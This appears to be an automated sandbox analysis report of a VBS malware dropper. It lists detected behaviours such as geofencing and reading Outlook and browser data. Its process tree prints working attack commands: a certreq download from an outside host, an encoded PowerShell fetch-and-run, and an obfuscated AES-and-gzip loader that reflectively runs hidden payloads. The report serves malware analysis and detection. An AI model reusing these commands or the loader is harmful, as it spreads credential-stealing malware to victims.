Analysis
-
max time kernel
70s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
09-12-2022 02:28
Static task
static1
Behavioral task
behavioral1
Sample
91ef79825a38a6d9942f8963206785bc.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
91ef79825a38a6d9942f8963206785bc.vbs
Resource
win10v2004-20220901-en
Behavioral task
behavioral3
Sample
f919de1034edc7b8a4a5a8aa8f0067dd.exe
Resource
win7-20220901-en
General
-
Target
91ef79825a38a6d9942f8963206785bc.vbs
-
Size
784B
-
MD5
4304fd3c7c6532cb19e0f29773b5e253
-
SHA1
333be879c7816ebc1417fad26953fc235e2cf2ac
-
SHA256
0593fa1832103b3903a35bbfab6f0331cb9031b75afeff791cc7d331f5c2a028
-
SHA512
faed7856e6f9e1933bd1730d1165c75e3dd12288fb7b5d9a3a6a2416efb5a592301aca98ce90562c59045d5f3e81b54c00d1afecc6634af85b330bd3c6ff2031
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 13 3480 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
mspalt.bat.exepid process 4260 mspalt.bat.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exemspalt.bat.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation mspalt.bat.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
mspalt.bat.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 mspalt.bat.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 mspalt.bat.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 mspalt.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exemspalt.bat.exepowershell.exepid process 3480 powershell.exe 3480 powershell.exe 3380 powershell.exe 3380 powershell.exe 4260 mspalt.bat.exe 4260 mspalt.bat.exe 4260 mspalt.bat.exe 4260 mspalt.bat.exe 3720 powershell.exe 3720 powershell.exe 3720 powershell.exe 3720 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exemspalt.bat.exepowershell.exedescription pid process Token: SeDebugPrivilege 3480 powershell.exe Token: SeDebugPrivilege 3380 powershell.exe Token: SeDebugPrivilege 4260 mspalt.bat.exe Token: SeDebugPrivilege 3720 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WScript.execmd.execmd.execmd.exepowershell.execmd.exemspalt.bat.exedescription pid process target process PID 4296 wrote to memory of 4468 4296 WScript.exe cmd.exe PID 4296 wrote to memory of 4468 4296 WScript.exe cmd.exe PID 4468 wrote to memory of 2328 4468 cmd.exe cmd.exe PID 4468 wrote to memory of 2328 4468 cmd.exe cmd.exe PID 4468 wrote to memory of 804 4468 cmd.exe cmd.exe PID 4468 wrote to memory of 804 4468 cmd.exe cmd.exe PID 2328 wrote to memory of 452 2328 cmd.exe certreq.exe PID 2328 wrote to memory of 452 2328 cmd.exe certreq.exe PID 4468 wrote to memory of 1528 4468 cmd.exe cmd.exe PID 4468 wrote to memory of 1528 4468 cmd.exe cmd.exe PID 1528 wrote to memory of 3480 1528 cmd.exe powershell.exe PID 1528 wrote to memory of 3480 1528 cmd.exe powershell.exe PID 3480 wrote to memory of 2212 3480 powershell.exe cmd.exe PID 3480 wrote to memory of 2212 3480 powershell.exe cmd.exe PID 2212 wrote to memory of 3380 2212 cmd.exe powershell.exe PID 2212 wrote to memory of 3380 2212 cmd.exe powershell.exe PID 2212 wrote to memory of 4260 2212 cmd.exe mspalt.bat.exe PID 2212 wrote to memory of 4260 2212 cmd.exe mspalt.bat.exe PID 4260 wrote to memory of 3720 4260 mspalt.bat.exe powershell.exe PID 4260 wrote to memory of 3720 4260 mspalt.bat.exe powershell.exe -
outlook_office_path 1 IoCs
Processes:
mspalt.bat.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 mspalt.bat.exe -
outlook_win_path 1 IoCs
Processes:
mspalt.bat.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 mspalt.bat.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\91ef79825a38a6d9942f8963206785bc.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "/c sTARt /B /mIn CeRTReQ.eXe -poSt -CONFIg http://jlhuoiljnuyjbyrtjyghiljoiuhyujhblkjlhnbyugjvytyjgbkjhnyutgyjhyb.ydns.eu/fire/derrffdde.bat c:\WindoWs\wrITE.Exe C:\Users\Admin\AppData\Roaming\MSW0RD.bat | Cmd /stART /b /mIn pING.exe & start C:\Users\Admin\AppData\Roaming\MSW0RD.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sTARt /B /mIn CeRTReQ.eXe -poSt -CONFIg http://jlhuoiljnuyjbyrtjyghiljoiuhyujhblkjlhnbyugjvytyjgbkjhnyutgyjhyb.ydns.eu/fire/derrffdde.bat c:\WindoWs\wrITE.Exe C:\Users\Admin\AppData\Roaming\MSW0RD.bat "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certreq.exeCeRTReQ.eXe -poSt -CONFIg http://jlhuoiljnuyjbyrtjyghiljoiuhyujhblkjlhnbyugjvytyjgbkjhnyutgyjhyb.ydns.eu/fire/derrffdde.bat c:\WindoWs\wrITE.Exe C:\Users\Admin\AppData\Roaming\MSW0RD.bat4⤵
-
C:\Windows\system32\cmd.exeCmd /stART /b /mIn pING.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\MSW0RD.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWeRsHELl -ex ByPASS -Nop -W 1 -eC IAAJAGkAbgBWAE8ASwBFAC0AVwBlAGIAUgBlAFEAVQBFAFMAVAAgAAkALQBVAFIAaQAgAAkAKAAdIGgAdAB0AHAAOgAdICAACQAgAAkAKwAgAAkAHSAvAC8AagBsAGgAdQBvAGkAbABqAG4AdQB5AGoAYgB5AHIAdABqAHkAZwBoAGkAbABqAG8AaQB1AGgAeQB1AGoAaAAdICAACQAgAAkAKwAgAAkAHSBiAGwAawBqAGwAaABuAGIAeQB1AGcAagB2AHkAdAB5AGoAZwBiAGsAagBoAG4AeQB1AHQAZwB5AGoAaAB5AGIAHSAgAAkAIAAJACsAIAAJAB0gLgB5AGQAbgBzAC4AZQB1AB0gIAAJACAACQArACAACQAdIC8AZgBpAHIAZQAvAHMAYQB2AGUALgBiAGEAdAAdICAACQApACAALQBPAFUAdABGAGkAbABFACAACQAdICQARQBOAFYAOgBUAGUATQBQAFwAbQBzAHAAYQBsAHQALgBiAGEAdAAdICAAOwAgAHMAVABBAFIAVAAgAAkAHSAkAEUATgB2ADoAdABFAE0AcABcAG0AcwBwAGEAbAB0AC4AYgBhAHQAHSA=4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mspalt.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -w hidden -ep bypass -c #6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\mspalt.bat.exe"C:\Users\Admin\AppData\Local\Temp\mspalt.bat.exe" -noprofile -ep bypass -c function yR($v){$v.Replace('@', '')}$Kh=yR 'Fro@mBa@se64@St@ri@ng@';$IZ=yR 'Spl@it@';$oS=yR 'R@e@a@dAll@Te@x@t@';$hn=yR 'Entr@yPo@int@';$bU=yR 'Ch@an@g@eEx@ten@s@io@n@';$qi=yR 'I@nv@ok@e@';$qJ=yR 'Get@Cu@r@r@e@ntP@ro@ces@s@';$Xu=yR 'Tra@ns@form@Fi@nal@Bloc@k@';$BY=yR 'C@r@ea@te@D@ecr@ypt@o@r@';$nX=yR 'Loa@d@';function nAwju($EukzE,$KnLgV,$DHvkN){$mNRTM=[System.Security.Cryptography.Aes]::Create();$mNRTM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mNRTM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mNRTM.Key=[System.Convert]::$Kh($KnLgV);$mNRTM.IV=[System.Convert]::$Kh($DHvkN);$XIotA=$mNRTM.$BY();$HuHEw=$XIotA.$Xu($EukzE,0,$EukzE.Length);$XIotA.Dispose();$mNRTM.Dispose();$HuHEw;}function GmSLK($EukzE){$ttBgS=New-Object System.IO.MemoryStream(,$EukzE);$bHGBk=New-Object System.IO.MemoryStream;$IttUw=New-Object System.IO.Compression.GZipStream($ttBgS,[IO.Compression.CompressionMode]::Decompress);$IttUw.CopyTo($bHGBk);$IttUw.Dispose();$ttBgS.Dispose();$bHGBk.Dispose();$bHGBk.ToArray();}function Gvvpt($EukzE,$KnLgV){[System.Reflection.Assembly]::$nX([byte[]]$EukzE).$hn.$qi($null,$KnLgV);}$cBaPI=[System.IO.File]::$oS([System.IO.Path]::$bU([System.Diagnostics.Process]::$qJ().MainModule.FileName, $null)).$IZ([Environment]::NewLine);$erUjZ=$cBaPI[$cBaPI.Length-1].Substring(2);$CYaoK=[string[]]$erUjZ.$IZ('\');$aOqoR=GmSLK (nAwju ([Convert]::$Kh($CYaoK[0])) $CYaoK[2] $CYaoK[3]);$YQHYd=GmSLK (nAwju ([Convert]::$Kh($CYaoK[1])) $CYaoK[2] $CYaoK[3]);Gvvpt $YQHYd $null;Gvvpt $aOqoR $null;6⤵
- Executes dropped EXE
- Checks computer location settings
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -c "$a = [System.Diagnostics.Process]::GetProcessById(4260);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5bb925cc5c32a817b61b5a68f00475ac2
SHA1368bbcd93d46036334f385fe80a6315130a873f4
SHA256cab89442f228f263a88d3db648093b2389fa2676ee3f95fccdd7c9574a8e1c11
SHA51269688f4277b0dfdeca560166776ecc74ae2933d6808e849ac60e0eb2310333d37e6216edb23737459a0e2395594a1cd579bccd008499e08526393d96315b4634
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5bae41789df209de6351654d76086f7c2
SHA114472787eac8e684154040b0223923e1d38f3d46
SHA25684fab5955633e7cf846c9682bfdaf209cb5c54b1df029046a9d595b1687895d3
SHA5127a164666724b2939437d1c2e3ad164928d4c9ccf6c9027621cc7a107f579f6bd685f9588063b0fe17730330c4b517b494c496b2268356e6d4a0c298c86cdcb59
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5b7955fb76a90e0f22cef807d30931389
SHA1b0baf94728fa95722bb79fd7e808915a34f325c6
SHA256b5ccfba6cd331784a1245aef10ac4f15f54c8794a3794e98e9999f235c6908a3
SHA51262411c96d8870fc02cb27d8f8a117e12f6dd0205980a2948594c7a80e377e82098dd98f0a192c101f9ac5cb993b8540f5a785b2978c20218b6a1b8ad5525c936
-
C:\Users\Admin\AppData\Local\Temp\mspalt.batFilesize
121KB
MD5c61a072f3a23cb30b7de5f2fde721aa5
SHA12cf6627b27746800cf433967723cba04437ea8c4
SHA2563b76cb3ab031658b762892f0d4145498eee84da51d451c67c1ca642afd79add1
SHA51291362eb4959556c7b9eeb23a407cddbb01b7842ab4e5b583fb61df7182d5e606d174f45a4a90f3791976f70aeff47595357f47a697521388cda924bb986ed3b2
-
C:\Users\Admin\AppData\Local\Temp\mspalt.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\mspalt.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Roaming\MSW0RD.batFilesize
645B
MD5834e89e3b40dc70d0066308c5aa8086b
SHA19938b28483b704b275d6239bf3696d4d68b7ddc0
SHA256e0821c032569fd1820f3399609b27f448db1b9d34043593661ea6000bbcdf0eb
SHA512c0562e96e7b8f2fc950ee4a29413c28202eaafd919b52156abc41a4f9489a4f56d797669dc7d58779b051f8bce2ac02c33aca79ba2374ccad2aa8fd643491c95
-
memory/452-135-0x0000000000000000-mapping.dmp
-
memory/804-134-0x0000000000000000-mapping.dmp
-
memory/1528-136-0x0000000000000000-mapping.dmp
-
memory/2212-141-0x0000000000000000-mapping.dmp
-
memory/2328-133-0x0000000000000000-mapping.dmp
-
memory/3380-147-0x00007FF98FD40000-0x00007FF990801000-memory.dmpFilesize
10.8MB
-
memory/3380-148-0x00007FF98FD40000-0x00007FF990801000-memory.dmpFilesize
10.8MB
-
memory/3380-144-0x0000000000000000-mapping.dmp
-
memory/3480-139-0x00000242C7650000-0x00000242C7672000-memory.dmpFilesize
136KB
-
memory/3480-138-0x0000000000000000-mapping.dmp
-
memory/3480-140-0x00007FF98FB50000-0x00007FF990611000-memory.dmpFilesize
10.8MB
-
memory/3480-143-0x00007FF98FB50000-0x00007FF990611000-memory.dmpFilesize
10.8MB
-
memory/3720-162-0x00007FF98FD40000-0x00007FF990801000-memory.dmpFilesize
10.8MB
-
memory/3720-159-0x00007FF98FD40000-0x00007FF990801000-memory.dmpFilesize
10.8MB
-
memory/3720-156-0x0000000000000000-mapping.dmp
-
memory/4260-157-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmpFilesize
2.0MB
-
memory/4260-154-0x00007FF9ADC00000-0x00007FF9ADCBE000-memory.dmpFilesize
760KB
-
memory/4260-153-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmpFilesize
2.0MB
-
memory/4260-152-0x00007FF98FD40000-0x00007FF990801000-memory.dmpFilesize
10.8MB
-
memory/4260-158-0x00007FF9ADC00000-0x00007FF9ADCBE000-memory.dmpFilesize
760KB
-
memory/4260-160-0x00007FF98FD40000-0x00007FF990801000-memory.dmpFilesize
10.8MB
-
memory/4260-161-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmpFilesize
2.0MB
-
memory/4260-149-0x0000000000000000-mapping.dmp
-
memory/4468-132-0x0000000000000000-mapping.dmp